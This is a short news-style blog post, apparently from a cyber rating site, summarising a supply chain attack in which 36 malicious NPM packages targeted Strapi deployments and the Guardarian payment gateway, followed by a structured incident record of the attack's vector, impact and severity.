• Home
  • cyber
  • Guardarian and Strapi: Guardarian Users Targeted With Malicious Strapi NPM Packages
cyber Cyber Attack

Guardarian and Strapi: Guardarian Users Targeted With Malicious Strapi NPM Packages

Apr 3, 2026 2 min read
Guardarian and Strapi: Guardarian Users Targeted With Malicious Strapi NPM Packages

Supply Chain Attack Targets Strapi Ecosystem with 36 Malicious NPM Packages

A recent supply chain attack has compromised the Strapi ecosystem, with threat actors publishing 36 malicious NPM packages across four accounts. Discovered by supply chain security firm SafeDep, the campaign delivers multiple payloads designed for Redis code execution, Docker container escape, credential harvesting, and reverse shell deployment.

The attack leverages several techniques, including:

  • Redis exploitation to inject crontab entries, deploy PHP webshells, Node.js reverse shells, and SSH keys, while exfiltrating a Guardarian API module.
  • Docker container escape via overlay filesystem discovery, enabling shell deployment on host systems and credential theft from Elasticsearch and cryptocurrency wallets.
  • Additional payloads targeting PostgreSQL databases, wallet/key files, Strapi configurations, and persistent implants.

The campaign appears tailored for Strapi users, evidenced by plugin naming conventions, targeted file paths, and environmental variables linked to Strapi’s Docker images. SafeDep’s analysis suggests the attacker initially pursued aggressive methods (Redis RCE, Docker escape) before shifting to reconnaissance, credential theft, and persistent access, with a focus on Guardarian, a cryptocurrency payment gateway.

The attack primarily affects Linux systems and Strapi deployments using Redis as a cache backend. Organizations impacted by the malicious packages are at risk of credential exposure, unauthorized access, and data exfiltration.

Source: https://www.securityweek.com/guardarian-users-targeted-with-malicious-strapi-npm-packages/

Strapi cybersecurity rating report: https://www.rankiteo.com/company/strapi

Guardarian cybersecurity rating report: https://www.rankiteo.com/company/guardarian

"id": "STRGUA1775478818",
"linkid": "strapi, guardarian",
"type": "Cyber Attack",
"date": "4/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
{'affected_entities': [{'industry': 'Technology',
                        'name': 'Strapi Ecosystem',
                        'type': 'Software Development Platform'}],
 'attack_vector': 'Malicious NPM Packages',
 'data_breach': {'data_exfiltration': True,
                 'file_types_exposed': ['PHP webshells',
                                        'Node.js reverse shells',
                                        'SSH keys'],
                 'sensitivity_of_data': 'High',
                 'type_of_data_compromised': ['Credentials',
                                              'Cryptocurrency wallet/key files',
                                              'Strapi configurations',
                                              'Personally Identifiable '
                                              'Information (PII)']},
 'description': 'A recent supply chain attack has compromised the Strapi '
                'ecosystem, with threat actors publishing 36 malicious NPM '
                'packages across four accounts. The campaign delivers multiple '
                'payloads designed for Redis code execution, Docker container '
                'escape, credential harvesting, and reverse shell deployment. '
                'The attack leverages techniques including Redis exploitation, '
                'Docker container escape, and credential theft from '
                'Elasticsearch and cryptocurrency wallets. The campaign '
                'appears tailored for Strapi users, with a focus on '
                'Guardarian, a cryptocurrency payment gateway.',
 'impact': {'data_compromised': ['Credentials',
                                 'Cryptocurrency wallet/key files',
                                 'Strapi configurations',
                                 'Guardarian API module'],
            'operational_impact': 'Unauthorized access, data exfiltration',
            'systems_affected': ['Linux systems',
                                 'Strapi deployments using Redis as a cache '
                                 'backend']},
 'initial_access_broker': {'backdoors_established': ['PHP webshells',
                                                     'Node.js reverse shells',
                                                     'SSH keys'],
                           'entry_point': 'Malicious NPM Packages',
                           'high_value_targets': ['Guardarian API module',
                                                  'Elasticsearch',
                                                  'PostgreSQL databases']},
 'motivation': ['Credential harvesting',
                'Data exfiltration',
                'Persistent access'],
 'post_incident_analysis': {'root_causes': ['Malicious NPM packages',
                                            'Exploitation of Redis and Docker '
                                            'vulnerabilities']},
 'references': [{'source': 'SafeDep'}],
 'response': {'third_party_assistance': 'SafeDep'},
 'title': 'Supply Chain Attack Targets Strapi Ecosystem with 36 Malicious NPM '
          'Packages',
 'type': 'Supply Chain Attack',
 'vulnerability_exploited': ['Redis code execution', 'Docker container escape']}
Published by
Jeremy C
Jeremy C
You might also like
Great! Next, complete checkout for full access to Rankiteo Blog.
Welcome back! You've successfully signed in.
You've successfully subscribed to Rankiteo Blog.
Success! Your account is fully activated, you now have access to all content.
Success! Your billing info has been updated.
Your billing was not updated.